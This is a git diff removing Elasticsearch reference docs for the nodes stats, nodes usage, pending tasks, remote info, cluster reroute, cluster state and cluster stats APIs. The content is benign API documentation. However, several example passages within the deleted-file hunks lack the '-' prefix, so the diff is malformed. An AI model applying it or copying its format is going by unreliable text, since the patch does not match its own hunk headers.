exponentially weighted moving average queue size of search requests on -the keyed node. - -`avg_service_time`:: -(<>) -The exponentially weighted moving average service time of search requests on -the keyed node. - -`avg_service_time_ns`:: -(integer) -The exponentially weighted moving average service time, in nanoseconds, of -search requests on the keyed node. - -`avg_response_time`:: -(<>) -The exponentially weighted moving average response time of search requests -on the keyed node. - -`avg_response_time_ns`:: -(integer) -The exponentially weighted moving average response time, in nanoseconds, of -search requests on the keyed node. - -`rank`:: -(string) -The rank of this node; used for shard selection when routing search -requests. 
-====== -===== -==== - -[[cluster-nodes-stats-api-example]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -# return just indices -GET /_nodes/stats/indices - -# return just os and process -GET /_nodes/stats/os,process - -# return just process for node with IP address 10.0.0.1 -GET /_nodes/10.0.0.1/stats/process --------------------------------------------------- - -All stats can be explicitly requested via `/_nodes/stats/_all` or -`/_nodes/stats?metric=_all`. - -You can get information about indices stats on `node`, `indices`, or `shards` -level. - -[source,console] --------------------------------------------------- -# Fielddata summarized by node -GET /_nodes/stats/indices/fielddata?fields=field1,field2 - -# Fielddata summarized by node and index -GET /_nodes/stats/indices/fielddata?level=indices&fields=field1,field2 - -# Fielddata summarized by node, index, and shard -GET /_nodes/stats/indices/fielddata?level=shards&fields=field1,field2 - -# You can use wildcards for field names -GET /_nodes/stats/indices/fielddata?fields=field* --------------------------------------------------- - -You can get statistics about search groups for searches executed -on this node. - -[source,console] --------------------------------------------------- -# All groups with all stats -GET /_nodes/stats?groups=_all - -# Some groups from just the indices stats -GET /_nodes/stats/indices?groups=foo,bar --------------------------------------------------- - -[[cluster-nodes-stats-ingest-ex]] -===== Retrieve ingest statistics only - -To return only ingest-related node statistics, set the `` path -parameter to `ingest` and use the -<> query parameter. - -[source,console] --------------------------------------------------- -GET /_nodes/stats/ingest?filter_path=nodes.*.ingest --------------------------------------------------- - -You can use the `metric` and `filter_path` query parameters to get the same -response. - -[source,console] --------------------------------------------------- -GET /_nodes/stats?metric=ingest&filter_path=nodes.*.ingest --------------------------------------------------- - -To further refine the response, change the `filter_path` value. -For example, the following request only returns ingest pipeline statistics. - -[source,console] --------------------------------------------------- -GET /_nodes/stats?metric=ingest&filter_path=nodes.*.ingest.pipelines --------------------------------------------------- diff --git a/docs/reference/cluster/nodes-usage.asciidoc b/docs/reference/cluster/nodes-usage.asciidoc deleted file mode 100644 index c62c42a5722..00000000000 --- a/docs/reference/cluster/nodes-usage.asciidoc +++ /dev/null @@ -1,110 +0,0 @@ -[[cluster-nodes-usage]] -=== Nodes feature usage API -++++ -Nodes feature usage -++++ - -Returns information on the usage of features. - - -[[cluster-nodes-usage-api-request]] -==== {api-request-title} - -`GET /_nodes/usage` + - -`GET /_nodes//usage` + - -`GET /_nodes/usage/` + - -`GET /_nodes//usage/` - -[[cluster-nodes-usage-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[cluster-nodes-usage-api-desc]] -==== {api-description-title} - -The cluster nodes usage API allows you to retrieve information on the usage -of features for each node. All the nodes selective options are explained -<>. 
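-
-As a minimal illustration, the following request limits the response to the
-REST actions usage of the node handling the request (the `_local` node filter
-and the `rest_actions` metric are both described below):
-
-[source,console]
---------------------------------------------------
-GET /_nodes/_local/usage/rest_actions
---------------------------------------------------
-// TEST[skip:illustrative example only]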
- - -[[cluster-nodes-usage-api-path-params]] -==== {api-path-parms-title} - -``:: - (Optional, string) Limits the information returned to the specific metrics. - A comma-separated list of the following options: -+ --- - `_all`:: - Returns all stats. - - `rest_actions`:: - Returns the REST actions classname with a count of the number of times - that action has been called on the node. --- - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=node-id] - - -[[cluster-nodes-usage-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - - -[[cluster-nodes-usage-api-example]] -==== {api-examples-title} - -Rest action example: - -[source,console] --------------------------------------------------- -GET _nodes/usage --------------------------------------------------- -// TEST[setup:node] - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "_nodes": { - "total": 1, - "successful": 1, - "failed": 0 - }, - "cluster_name": "my_cluster", - "nodes": { - "pQHNt5rXTTWNvUgOrdynKg": { - "timestamp": 1492553961812, <1> - "since": 1492553906606, <2> - "rest_actions": { - "nodes_usage_action": 1, - "create_index_action": 1, - "document_get_action": 1, - "search_action": 19, <3> - "nodes_info_action": 36 - }, - "aggregations": { - ... - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"my_cluster"/$body.cluster_name/] -// TESTRESPONSE[s/"pQHNt5rXTTWNvUgOrdynKg"/\$node_name/] -// TESTRESPONSE[s/1492553961812/$body.$_path/] -// TESTRESPONSE[s/1492553906606/$body.$_path/] -// TESTRESPONSE[s/"rest_actions": [^}]+}/"rest_actions": $body.$_path/] -// TESTRESPONSE[s/"aggregations": [^}]+}/"aggregations": $body.$_path/] -<1> Timestamp for when this nodes usage request was performed. -<2> Timestamp for when the usage information recording was started. This is -equivalent to the time that the node was started. -<3> Search action has been called 19 times for this node. - diff --git a/docs/reference/cluster/pending.asciidoc b/docs/reference/cluster/pending.asciidoc deleted file mode 100644 index b7d73b79410..00000000000 --- a/docs/reference/cluster/pending.asciidoc +++ /dev/null @@ -1,102 +0,0 @@ -[[cluster-pending]] -=== Pending cluster tasks API -++++ -Pending cluster tasks -++++ - -Returns cluster-level changes that have not yet been executed. - - -[[cluster-pending-api-request]] -==== {api-request-title} - -`GET /_cluster/pending_tasks` - -[[cluster-pending-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[cluster-pending-api-desc]] -==== {api-description-title} - -The pending cluster tasks API returns a list of any cluster-level changes (e.g. -create index, update mapping, allocate or fail shard) which have not yet been -executed. - -NOTE: This API returns a list of any pending updates to the cluster state. These are distinct from the tasks reported by the -<> which include periodic tasks and tasks initiated by the user, such as node stats, search queries, or create -index requests. However, if a user-initiated task such as a create index command causes a cluster state update, the activity of this task -might be reported by both task api and pending cluster tasks API. 
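-
-For example, a minimal request looks like this (the optional query parameters
-described below can be appended as needed):
-
-[source,console]
---------------------------------------------------
-GET /_cluster/pending_tasks
---------------------------------------------------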
- - -[[cluster-pending-api-path-params]] -==== {api-path-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - - -[[cluster-pending-api-response-body]] -==== {api-response-body-title} - -`tasks`:: - (object) A list of pending tasks. - -`insert_order`:: - (integer) The number that represents when the task has been inserted into - the task queue. - -`priority`:: - (string) The priority of the pending task. - -`source`:: - (string) A general description of the cluster task that may include a reason - and origin. - -`time_in_queue_millis`:: - (integer) The time expressed in milliseconds since the task is waiting for - being performed. - -`time_in_queue`:: - (string) The time since the task is waiting for being performed. - - -[[cluster-pending-api-example]] -==== {api-examples-title} - -Usually the request will return an empty list as cluster-level changes are fast. -However, if there are tasks queued up, the response will look similar like this: - -[source,js] --------------------------------------------------- -{ - "tasks": [ - { - "insert_order": 101, - "priority": "URGENT", - "source": "create-index [foo_9], cause [api]", - "time_in_queue_millis": 86, - "time_in_queue": "86ms" - }, - { - "insert_order": 46, - "priority": "HIGH", - "source": "shard-started ([foo_2][1], node[tMTocMvQQgGCkj7QDHl3OA], [P], s[INITIALIZING]), reason [after recovery from shard_store]", - "time_in_queue_millis": 842, - "time_in_queue": "842ms" - }, - { - "insert_order": 45, - "priority": "HIGH", - "source": "shard-started ([foo_2][0], node[tMTocMvQQgGCkj7QDHl3OA], [P], s[INITIALIZING]), reason [after recovery from shard_store]", - "time_in_queue_millis": 858, - "time_in_queue": "858ms" - } - ] -} --------------------------------------------------- -// NOTCONSOLE -// We can't test tasks output diff --git a/docs/reference/cluster/remote-info.asciidoc b/docs/reference/cluster/remote-info.asciidoc deleted file mode 100644 index bbcc2321c12..00000000000 --- a/docs/reference/cluster/remote-info.asciidoc +++ /dev/null @@ -1,68 +0,0 @@ -[[cluster-remote-info]] -=== Remote cluster info API -++++ -Remote cluster info -++++ - -Returns configured remote cluster information. - - -[[cluster-remote-info-api-request]] -==== {api-request-title} - -`GET /_remote/info` - -[[cluster-remote-info-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[cluster-remote-info-api-desc]] -==== {api-description-title} - -The cluster remote info API allows you to retrieve all of the configured -remote cluster information. It returns connection and endpoint information keyed -by the configured remote cluster alias. - - -[[cluster-remote-info-api-response-body]] -==== {api-response-body-title} - -`mode`:: - Connection mode for the remote cluster. Returned values are `sniff` and - `proxy`. - -`connected`:: - True if there is at least one connection to the remote cluster. - -`initial_connect_timeout`:: - The initial connect timeout for remote cluster connections. - -[[skip-unavailable]] -`skip_unavailable`:: - Whether the remote cluster is skipped in case it is searched through - a {ccs} request but none of its nodes are available. - -`seeds`:: - Initial seed transport addresses of the remote cluster when sniff mode is - configured. - -`num_nodes_connected`:: - Number of connected nodes in the remote cluster when sniff mode is - configured. 
- -`max_connections_per_cluster`:: - Maximum number of connections maintained for the remote cluster when sniff - mode is configured. - -`proxy_address`:: - Address for remote connections when proxy mode is configured. - -`num_proxy_sockets_connected`:: - Number of open socket connections to the remote cluster when proxy mode - is configured. - -`max_proxy_socket_connections`:: - The maximum number of socket connections to the remote cluster when proxy - mode is configured. diff --git a/docs/reference/cluster/reroute.asciidoc b/docs/reference/cluster/reroute.asciidoc deleted file mode 100644 index c496cdc295a..00000000000 --- a/docs/reference/cluster/reroute.asciidoc +++ /dev/null @@ -1,210 +0,0 @@ -[[cluster-reroute]] -=== Cluster reroute API -++++ -Cluster reroute -++++ - -Changes the allocation of shards in a cluster. - - -[[cluster-reroute-api-request]] -==== {api-request-title} - -`POST /_cluster/reroute` - -[[cluster-reroute-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `manage` -<> to use this API. - -[[cluster-reroute-api-desc]] -==== {api-description-title} - -The reroute command allows for manual changes to the allocation of individual -shards in the cluster. For example, a shard can be moved from one node to -another explicitly, an allocation can be cancelled, and an unassigned shard can -be explicitly allocated to a specific node. - -It is important to note that after processing any reroute commands {es} will -perform rebalancing as normal (respecting the values of settings such as -`cluster.routing.rebalance.enable`) in order to remain in a balanced state. For -example, if the requested allocation includes moving a shard from `node1` to -`node2` then this may cause a shard to be moved from `node2` back to `node1` to -even things out. - -The cluster can be set to disable allocations using the -`cluster.routing.allocation.enable` setting. If allocations are disabled then -the only allocations that will be performed are explicit ones given using the -`reroute` command, and consequent allocations due to rebalancing. - -It is possible to run `reroute` commands in "dry run" mode by using the -`?dry_run` URI query parameter, or by passing `"dry_run": true` in the request -body. This will calculate the result of applying the commands to the current -cluster state, and return the resulting cluster state after the commands (and -re-balancing) has been applied, but will not actually perform the requested -changes. - -If the `?explain` URI query parameter is included then a detailed explanation -of why the commands could or could not be executed is included in the response. - -The cluster will attempt to allocate a shard a maximum of -`index.allocation.max_retries` times in a row (defaults to `5`), before giving -up and leaving the shard unallocated. This scenario can be caused by -structural problems such as having an analyzer which refers to a stopwords -file which doesn't exist on all nodes. - -Once the problem has been corrected, allocation can be manually retried by -calling the `reroute` API with the `?retry_failed` URI -query parameter, which will attempt a single retry round for these shards. - - -[[cluster-reroute-api-query-params]] -[role="child_attributes"] -==== {api-query-parms-title} - -`dry_run`:: - (Optional, Boolean) If `true`, then the request simulates the operation only - and returns the resulting state. 
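-+
-For example, a hypothetical dry run of a single `move` command (the index and
-node names below are placeholders) could look like this:
-+
-[source,console]
---------------------------------------------------
-POST /_cluster/reroute?dry_run=true
-{
-  "commands": [
-    {
-      "move": {
-        "index": "my-index", "shard": 0,
-        "from_node": "node1", "to_node": "node2"
-      }
-    }
-  ]
-}
---------------------------------------------------
-// TEST[skip:illustrative example only]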
- -`explain`:: - (Optional, Boolean) If `true`, then the response contains an explanation of - why the commands can or cannot be executed. - -`metric`:: - (Optional, string) Limits the information returned to the specified metrics. - Defaults to all but metadata The following options are available: - -+ -.Options for `metric` -[%collapsible%open] -====== -`_all`:: - Shows all metrics. - -`blocks`:: - Shows the `blocks` part of the response. - -`master_node`:: - Shows the elected `master_node` part of the response. - -`metadata`:: - Shows the `metadata` part of the response. If you supply a comma separated - list of indices, the returned output will only contain metadata for these - indices. - -`nodes`:: - Shows the `nodes` part of the response. - -`routing_table`:: - Shows the `routing_table` part of the response. - -`version`:: - Shows the cluster state version. -====== - - -`retry_failed`:: - (Optional, Boolean) If `true`, then retries allocation of shards that are - blocked due to too many subsequent allocation failures. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - -[role="child_attributes"] -[[cluster-reroute-api-request-body]] -==== {api-request-body-title} - -`commands`:: - (Required, array of objects) Defines the commands to perform. Supported commands are: - -+ -.Properties of `commands` -[%collapsible%open] -====== - -`move`:: - Move a started shard from one node to another node. Accepts `index` and - `shard` for index name and shard number, `from_node` for the node to move - the shard from, and `to_node` for the node to move the shard to. - -`cancel`:: - Cancel allocation of a shard (or recovery). Accepts `index` and `shard` for - index name and shard number, and `node` for the node to cancel the shard - allocation on. This can be used to force resynchronization of existing - replicas from the primary shard by cancelling them and allowing them to be - reinitialized through the standard recovery process. By default only - replica shard allocations can be cancelled. If it is necessary to cancel - the allocation of a primary shard then the `allow_primary` flag must also - be included in the request. - -`allocate_replica`:: - Allocate an unassigned replica shard to a node. Accepts `index` and `shard` - for index name and shard number, and `node` to allocate the shard to. Takes - <> into account. - -Two more commands are available that allow the allocation of a primary shard to -a node. These commands should however be used with extreme care, as primary -shard allocation is usually fully automatically handled by {es}. Reasons why a -primary shard cannot be automatically allocated include the -following: - -- A new index was created but there is no node which satisfies the allocation - deciders. -- An up-to-date shard copy of the data cannot be found on the current data - nodes in the cluster. To prevent data loss, the system does not automatically -promote a stale shard copy to primary. - -The following two commands are dangerous and may result in data loss. They are -meant to be used in cases where the original data can not be recovered and the -cluster administrator accepts the loss. If you have suffered a temporary issue -that can be fixed, please see the `retry_failed` flag described above. To -emphasise: if these commands are performed and then a node joins the cluster -that holds a copy of the affected shard then the copy on the newly-joined node -will be deleted or overwritten. 
- -`allocate_stale_primary`:: - Allocate a primary shard to a node that holds a stale copy. Accepts the - `index` and `shard` for index name and shard number, and `node` to allocate - the shard to. Using this command may lead to data loss for the provided - shard id. If a node which has the good copy of the data rejoins the cluster - later on, that data will be deleted or overwritten with the data of the - stale copy that was forcefully allocated with this command. To ensure that - these implications are well-understood, this command requires the flag - `accept_data_loss` to be explicitly set to `true`. - -`allocate_empty_primary`:: - Allocate an empty primary shard to a node. Accepts the `index` and `shard` - for index name and shard number, and `node` to allocate the shard to. Using - this command leads to a complete loss of all data that was indexed into - this shard, if it was previously started. If a node which has a copy of the - data rejoins the cluster later on, that data will be deleted. To ensure - that these implications are well-understood, this command requires the flag - `accept_data_loss` to be explicitly set to `true`. -====== - -[[cluster-reroute-api-example]] -==== {api-examples-title} - -This is a short example of a simple reroute API call: - -[source,console] --------------------------------------------------- -POST /_cluster/reroute -{ - "commands": [ - { - "move": { - "index": "test", "shard": 0, - "from_node": "node1", "to_node": "node2" - } - }, - { - "allocate_replica": { - "index": "test", "shard": 1, - "node": "node3" - } - } - ] -} --------------------------------------------------- -// TEST[skip:doc tests run with only a single node] diff --git a/docs/reference/cluster/state.asciidoc b/docs/reference/cluster/state.asciidoc deleted file mode 100644 index 160153ee5e5..00000000000 --- a/docs/reference/cluster/state.asciidoc +++ /dev/null @@ -1,161 +0,0 @@ -[[cluster-state]] -=== Cluster state API -++++ -Cluster state -++++ - -Returns metadata about the state of the cluster. - -[[cluster-state-api-request]] -==== {api-request-title} - -`GET /_cluster/state//` - -[[cluster-state-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[cluster-state-api-desc]] -==== {api-description-title} - -The cluster state API allows access to metadata representing the state of the -whole cluster. This includes information such as - -* the set of nodes in the cluster - -* all cluster-level settings - -* information about the indices in the cluster, including their mappings and - settings - -* the locations of all the shards in the cluster. - -NOTE: The response is an internal representation of the cluster state and its -format may change from version to version. If possible, you should obtain any -information from the cluster state using the other, more stable, -<>. - -The response provides the cluster state itself, which can be filtered to only -retrieve the parts of interest as described below. - -The cluster's `cluster_uuid` is also returned as part of the top-level response, -in addition to the `metadata` section. added[6.4.0] - -NOTE: While the cluster is still forming, it is possible for the `cluster_uuid` - to be `_na_` as well as the cluster state's version to be `-1`. - -By default, the cluster state request is routed to the master node, to ensure -that the latest cluster state is returned. 
For debugging purposes, you can -retrieve the cluster state local to a particular node by adding `local=true` to -the query string. - -[[cluster-state-api-path-params]] -==== {api-path-parms-title} - -The cluster state contains information about all the indices in the cluster, -including their mappings, as well as templates and other metadata. This means it -can sometimes be quite large. To avoid the need to process all this information -you can request only the part of the cluster state that you need: - -``:: - (Optional, string) A comma-separated list of the following options: -+ --- - `_all`:: - Shows all metrics. - - `blocks`:: - Shows the `blocks` part of the response. - - `master_node`:: - Shows the elected `master_node` part of the response. - - `metadata`:: - Shows the `metadata` part of the response. If you supply a comma separated - list of indices, the returned output will only contain metadata for these - indices. - - `nodes`:: - Shows the `nodes` part of the response. - - `routing_nodes`:: - Shows the `routing_nodes` part of the response. - - `routing_table`:: - Shows the `routing_table` part of the response. If you supply a comma - separated list of indices, the returned output will only contain the - routing table for these indices. - - `version`:: - Shows the cluster state version. --- - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases used to limit -the request. Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - - -[[cluster-state-api-query-params]] -==== {api-query-parms-title} - -`allow_no_indices`:: - (Optional, Boolean) If `true`, the wildcard indices expression that resolves - into no concrete indices will be ignored. (This includes `_all` string or - when no indices have been specified). -+ -Defaults to `true`. - -`expand_wildcards`:: - (Optional, string) Whether to expand wildcard expression to concrete indices - that are open, closed or both. Available options: `open`, `closed`, `none`, - `all`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=flat-settings] - -`ignore_unavailable`:: - (Optional, Boolean) If `true`, unavailable indices (missing or closed) will - be ignored. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - -`wait_for_metadata_version`:: - (Optional, integer) Waits for the metadata version to be equal or greater - than the specified metadata version. - -`wait_for_timeout`:: - (Optional, <>) Specifies the maximum time to wait - for wait_for_metadata_version before timing out. 
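-+
-As an illustration, the following request (with hypothetical values) waits up
-to one minute for the cluster metadata version to reach at least `10` before
-returning the `metadata` part of the cluster state:
-+
-[source,console]
---------------------------------------------------
-GET /_cluster/state/metadata?wait_for_metadata_version=10&wait_for_timeout=1m
---------------------------------------------------
-// TEST[skip:illustrative example only]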
- - -[[cluster-state-api-example]] -==== {api-examples-title} - -The following example returns only `metadata` and `routing_table` data for the -`foo` and `bar` data streams or indices: - -[source,console] --------------------------------------------------- -GET /_cluster/state/metadata,routing_table/foo,bar --------------------------------------------------- - -The next example returns all available metadata for `foo` and `bar`: - -[source,console] --------------------------------------------------- -GET /_cluster/state/_all/foo,bar --------------------------------------------------- - -This example returns only the `blocks` metadata: - -[source,console] --------------------------------------------------- -GET /_cluster/state/blocks --------------------------------------------------- diff --git a/docs/reference/cluster/stats.asciidoc b/docs/reference/cluster/stats.asciidoc deleted file mode 100644 index fecd0208550..00000000000 --- a/docs/reference/cluster/stats.asciidoc +++ /dev/null @@ -1,1356 +0,0 @@ -[[cluster-stats]] -=== Cluster stats API -++++ -Cluster stats -++++ - -Returns cluster statistics. - - -[[cluster-stats-api-request]] -==== {api-request-title} - -`GET /_cluster/stats` + - -`GET /_cluster/stats/nodes/` - -[[cluster-stats-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[cluster-stats-api-desc]] -==== {api-description-title} - -The Cluster Stats API allows to retrieve statistics from a cluster wide -perspective. The API returns basic index metrics (shard numbers, store size, -memory usage) and information about the current nodes that form the cluster -(number, roles, os, jvm versions, memory usage, cpu and installed plugins). - - -[[cluster-stats-api-path-params]] -==== {api-path-parms-title} - - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=node-filter] - - -[[cluster-stats-api-query-params]] -==== {api-query-parms-title} - -`timeout`:: -(Optional, <>) -Period to wait for each node to respond. If a node does not respond before its -timeout expires, the response does not include its stats. However, timed out -nodes are included in the response's `_nodes.failed` property. Defaults to no -timeout. - -[role="child_attributes"] -[[cluster-stats-api-response-body]] -==== {api-response-body-title} - -`_nodes`:: -(object) -Contains statistics about the number of nodes selected by the request's -<>. -+ -.Properties of `_nodes` -[%collapsible%open] -==== -`total`:: -(integer) -Total number of nodes selected by the request. - -`successful`:: -(integer) -Number of nodes that responded successfully to the request. - -`failed`:: -(integer) -Number of nodes that rejected the request or failed to respond. If this value -is not `0`, a reason for the rejection or failure is included in the response. -==== - -`cluster_name`:: -(string) -Name of the cluster, based on the <> setting. - -`cluster_uuid`:: -(string) -Unique identifier for the cluster. - -`timestamp`:: -(integer) -{wikipedia}/Unix_time[Unix timestamp], in milliseconds, of -the last time the cluster statistics were refreshed. - -`status`:: -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cluster-health-status] -+ -See <>. - -[[cluster-stats-api-response-body-indices]] -`indices`:: -(object) -Contains statistics about indices with shards assigned to selected nodes. -+ -.Properties of `indices` -[%collapsible%open] -==== -`count`:: -(integer) -Total number of indices with shards assigned to selected nodes. 
- -`shards`:: -(object) -Contains statistics about shards assigned to selected nodes. -+ -.Properties of `shards` -[%collapsible%open] -===== -`total`:: -(integer) -Total number of shards assigned to selected nodes. - -`primaries`:: -(integer) -Number of primary shards assigned to selected nodes. - -`replication`:: -(float) -Ratio of replica shards to primary shards across all selected nodes. - -`index`:: -(object) -Contains statistics about shards assigned to selected nodes. -+ -.Properties of `index` -[%collapsible%open] -====== -`shards`:: -(object) -Contains statistics about the number of shards assigned to selected nodes. -+ -.Properties of `shards` -[%collapsible%open] -======= -`min`:: -(integer) -Minimum number of shards in an index, counting only shards assigned to -selected nodes. - -`max`:: -(integer) -Maximum number of shards in an index, counting only shards assigned to -selected nodes. - -`avg`:: -(float) -Mean number of shards in an index, counting only shards assigned to -selected nodes. -======= - -`primaries`:: -(object) -Contains statistics about the number of primary shards assigned to selected -nodes. -+ -.Properties of `primaries` -[%collapsible%open] -======= -`min`:: -(integer) -Minimum number of primary shards in an index, counting only shards assigned -to selected nodes. - -`max`:: -(integer) -Maximum number of primary shards in an index, counting only shards assigned -to selected nodes. - -`avg`:: -(float) -Mean number of primary shards in an index, counting only shards assigned to -selected nodes. -======= - -`replication`:: -(object) -Contains statistics about the number of replication shards assigned to selected -nodes. -+ -.Properties of `replication` -[%collapsible%open] -======= -`min`:: -(float) -Minimum replication factor in an index, counting only shards assigned to -selected nodes. - -`max`:: -(float) -Maximum replication factor in an index, counting only shards assigned to -selected nodes. - -`avg`:: -(float) -Mean replication factor in an index, counting only shards assigned to selected -nodes. -======= -====== -===== - -`docs`:: -(object) -Contains counts for documents in selected nodes. -+ -.Properties of `docs` -[%collapsible%open] -===== -`count`:: -(integer) -Total number of non-deleted documents across all primary shards assigned to -selected nodes. -+ -This number is based on documents in Lucene segments and may include documents -from nested fields. - -`deleted`:: -(integer) -Total number of deleted documents across all primary shards assigned to -selected nodes. -+ -This number is based on documents in Lucene segments. {es} reclaims the disk -space of deleted Lucene documents when a segment is merged. -===== - -`store`:: -(object) -Contains statistics about the size of shards assigned to selected nodes. -+ -.Properties of `store` -[%collapsible%open] -===== -`size`:: -(<>) -Total size of all shards assigned to selected nodes. - -`size_in_bytes`:: -(integer) -Total size, in bytes, of all shards assigned to selected nodes. - -`reserved`:: -(<>) -A prediction of how much larger the shard stores will eventually grow due to -ongoing peer recoveries, restoring snapshots, and similar activities. - -`reserved_in_bytes`:: -(integer) -A prediction, in bytes, of how much larger the shard stores will eventually -grow due to ongoing peer recoveries, restoring snapshots, and similar -activities. -===== - -`fielddata`:: -(object) -Contains statistics about the <> of selected nodes. 
-+ -.Properties of `fielddata` -[%collapsible%open] -===== -`memory_size`:: -(<>) -Total amount of memory used for the field data cache across all shards -assigned to selected nodes. - -`memory_size_in_bytes`:: -(integer) -Total amount, in bytes, of memory used for the field data cache across all -shards assigned to selected nodes. - -`evictions`:: -(integer) -Total number of evictions from the field data cache across all shards assigned -to selected nodes. -===== - -`query_cache`:: -(object) -Contains statistics about the query cache of selected nodes. -+ -.Properties of `query_cache` -[%collapsible%open] -===== -`memory_size`:: -(<>) -Total amount of memory used for the query cache across all shards assigned to -selected nodes. - -`memory_size_in_bytes`:: -(integer) -Total amount, in bytes, of memory used for the query cache across all shards -assigned to selected nodes. - -`total_count`:: -(integer) -Total count of hits and misses in the query cache across all shards assigned to -selected nodes. - -`hit_count`:: -(integer) -Total count of query cache hits across all shards assigned to selected nodes. - -`miss_count`:: -(integer) -Total count of query cache misses across all shards assigned to selected nodes. - -`cache_size`:: -(integer) -Total number of entries currently in the query cache across all shards assigned -to selected nodes. - -`cache_count`:: -(integer) -Total number of entries added to the query cache across all shards assigned -to selected nodes. This number includes current and evicted entries. - -`evictions`:: -(integer) -Total number of query cache evictions across all shards assigned to selected -nodes. -===== - -`completion`:: -(object) -Contains statistics about memory used for completion in selected nodes. -+ -.Properties of `completion` -[%collapsible%open] -===== -`size`:: -(<>) -Total amount of memory used for completion across all shards assigned to -selected nodes. - -`size_in_bytes`:: -(integer) -Total amount, in bytes, of memory used for completion across all shards assigned -to selected nodes. -===== - -`segments`:: -(object) -Contains statistics about segments in selected nodes. -+ -.Properties of `segments` -[%collapsible%open] -===== -`count`:: -(integer) -Total number of segments across all shards assigned to selected nodes. - -`memory`:: -(<>) -Total amount of memory used for segments across all shards assigned to selected -nodes. - -`memory_in_bytes`:: -(integer) -Total amount, in bytes, of memory used for segments across all shards assigned to -selected nodes. - -`terms_memory`:: -(<>) -Total amount of memory used for terms across all shards assigned to selected -nodes. - -`terms_memory_in_bytes`:: -(integer) -Total amount, in bytes, of memory used for terms across all shards assigned to -selected nodes. - -`stored_fields_memory`:: -(<>) -Total amount of memory used for stored fields across all shards assigned to -selected nodes. - -`stored_fields_memory_in_bytes`:: -(integer) -Total amount, in bytes, of memory used for stored fields across all shards -assigned to selected nodes. - -`term_vectors_memory`:: -(<>) -Total amount of memory used for term vectors across all shards assigned to -selected nodes. - -`term_vectors_memory_in_bytes`:: -(integer) -Total amount, in bytes, of memory used for term vectors across all shards -assigned to selected nodes. - -`norms_memory`:: -(<>) -Total amount of memory used for normalization factors across all shards assigned -to selected nodes. 
- -`norms_memory_in_bytes`:: -(integer) -Total amount, in bytes, of memory used for normalization factors across all -shards assigned to selected nodes. - -`points_memory`:: -(<>) -Total amount of memory used for points across all shards assigned to selected -nodes. - -`points_memory_in_bytes`:: -(integer) -Total amount, in bytes, of memory used for points across all shards assigned to -selected nodes. - -`doc_values_memory`:: -(<>) -Total amount of memory used for doc values across all shards assigned to -selected nodes. - -`doc_values_memory_in_bytes`:: -(integer) -Total amount, in bytes, of memory used for doc values across all shards assigned -to selected nodes. - -`index_writer_memory`:: -(<>) -Total amount of memory used by all index writers across all shards assigned to -selected nodes. - -`index_writer_memory_in_bytes`:: -(integer) -Total amount, in bytes, of memory used by all index writers across all shards -assigned to selected nodes. - -`version_map_memory`:: -(<>) -Total amount of memory used by all version maps across all shards assigned to -selected nodes. - -`version_map_memory_in_bytes`:: -(integer) -Total amount, in bytes, of memory used by all version maps across all shards -assigned to selected nodes. - -`fixed_bit_set`:: -(<>) -Total amount of memory used by fixed bit sets across all shards assigned to -selected nodes. -+ -Fixed bit sets are used for nested object field types and -type filters for <> fields. - -`fixed_bit_set_memory_in_bytes`:: -(integer) -Total amount of memory, in bytes, used by fixed bit sets across all shards -assigned to selected nodes. - -`max_unsafe_auto_id_timestamp`:: -(integer) -{wikipedia}/Unix_time[Unix timestamp], in milliseconds, of -the most recently retried indexing request. - -`file_sizes`:: -(object) -This object is not populated by the cluster stats API. -+ -To get information on segment files, use the <>. -===== - -`mappings`:: -(object) -Contains statistics about <> in selected nodes. -+ -.Properties of `mappings` -[%collapsible%open] -===== -`field_types`:: -(array of objects) -Contains statistics about <> used in selected -nodes. -+ -.Properties of `field_types` objects -[%collapsible%open] -====== -`name`:: -(string) -Field data type used in selected nodes. - -`count`:: -(integer) -Number of fields mapped to the field data type in selected nodes. - -`index_count`:: -(integer) -Number of indices containing a mapping of the field data type in selected nodes. -====== -===== - -`analysis`:: -(object) -Contains statistics about <> -used in selected nodes. -+ -.Properties of `analysis` -[%collapsible%open] -===== -`char_filter_types`:: -(array of objects) -Contains statistics about <> types used -in selected nodes. -+ -.Properties of `char_filter_types` objects -[%collapsible%open] -====== -`name`:: -(string) -Character filter type used in selected nodes. - -`count`:: -(integer) -Number of analyzers or normalizers using the character filter type in selected -nodes. - -`index_count`:: -(integer) -Number of indices the character filter type in selected nodes. -====== - -`tokenizer_types`:: -(array of objects) -Contains statistics about <> types used in -selected nodes. -+ -.Properties of `tokenizer_types` objects -[%collapsible%open] -====== -`name`:: -(string) -Tokenizer type used in selected nodes. - -`count`:: -(integer) -Number of analyzers or normalizers using the tokenizer type in selected nodes. - -`index_count`:: -(integer) -Number of indices using the tokenizer type in selected nodes. 
